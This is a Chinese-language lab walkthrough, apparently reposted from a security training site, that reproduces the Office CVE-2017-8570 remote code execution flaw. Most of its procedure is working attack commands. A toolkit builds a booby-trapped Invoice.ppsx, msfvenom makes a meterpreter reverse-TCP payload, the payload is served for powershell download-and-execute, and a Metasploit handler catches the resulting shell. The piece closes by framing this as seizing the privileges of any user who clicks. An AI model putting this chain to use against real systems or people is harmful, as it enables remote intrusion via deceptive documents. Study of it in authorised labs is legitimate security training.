CVE-2017-8570漏洞復現與漏洞利用
CVE-2017-8570漏洞為一個邏輯漏洞,利用方法簡單,影響範圍廣。由於該漏洞和三年前的SandWorm(沙蟲)漏洞非常類似,因此我們稱之為「沙蟲」二代漏洞:Office全家桶
0x00 實驗環境
- 操作機:windows7 x64
- IP:172.16.11.2
- 目標機:Kali Linux
- IP:172.16.12.2
0x01 漏洞介紹
OfficeCVE-2017-85702017年7月,微軟在例行的閱讀補丁中修復了多個Microsoft Office漏洞,其中的CVE-2017-8570漏洞為一個邏輯漏洞,利用方法簡單。網上公布了利用代碼影響範圍廣泛。該漏洞為Microsoft Office的一個遠程代碼執行漏洞。
其成因是Microsof PowerPoint執行時會初始化「script」Moniker對象,而在PowerPoint播放動畫期間會激活該對象,從而執行sct腳本(Windows script Component)文件。可以欺騙用戶運行含有該漏洞的PPT文件導致獲取和當前登錄用戶相同的執行許可權。
0x02 影響版本
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
0x03 實驗步驟
1.生成惡意ppsx文件xshell連接kali主機
在kali下執行如下命令:
cd CVE-2017-8570 //進入exploit的目錄
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc //生成ppsx惡意文件
使用ls命令,可以看到已經成功生成了ppsx格式文件。
接下來將生成的惡意ppsx文件,通過調用powershell下載並執行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe
其中 -p 參數是 payload的意思,是使用windows的meterpreter的反彈文件-f參數 指定輸出文件後綴為exe文件再用>重定向輸出到tmp目錄下
接下來輸入如下命令:
python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe
這段命令是通過腳本在80埠監聽,等待接收ppsx請求並下載執行我們的反彈文件
接下來進入Metasploit,新建一個Kali`172.16.12.2的連接,設置相關參數,接受返回的Shell
msfconsole
use multi/handler //使用監聽模塊
set payload windows/meterpreter/reverse_tcp //設置Payload
set LHOST 172.16.12.2 //設置本地接收IP
run
可以看到我們的Metaspliot已經在本地開啟監聽
到此我們的所有準備都做好,下一步我們模擬用戶點擊惡意文件
2.目標機器執行惡意ppsx文件
我們使用桌面Xftp
軟體,用戶名、密碼是root,123456,使用sftp連接方式,連接上目標機172.16.12.2
,將Invoice.ppsx雙擊打開
執行過程中可以看到代碼通過調用powershell在遠程下載執行我們的惡意文件,此時已經反彈回了shell
執行命令:
getuid //獲取當前用戶ID
這樣就獲取了目標機器的許可權,可以通過Metasploit去執行命令。
0x04 總結
Office一直是主流的辦公軟體,CVE-2017-8570這個漏洞影響office所有發行版本,當用戶不經意點擊了我們的惡意PPSX文件,那麼我們就可以直接獲取到他的用戶許可權,可以看到危害性十足。
參考來源:i春秋
Office遠程代碼執行漏洞(CVE-2017-8570)_視頻教程_i春秋_培育信息時代的安全感!
推薦閱讀:
TAG:漏洞挖掘 | 漏洞 | 黑客(Hacker) |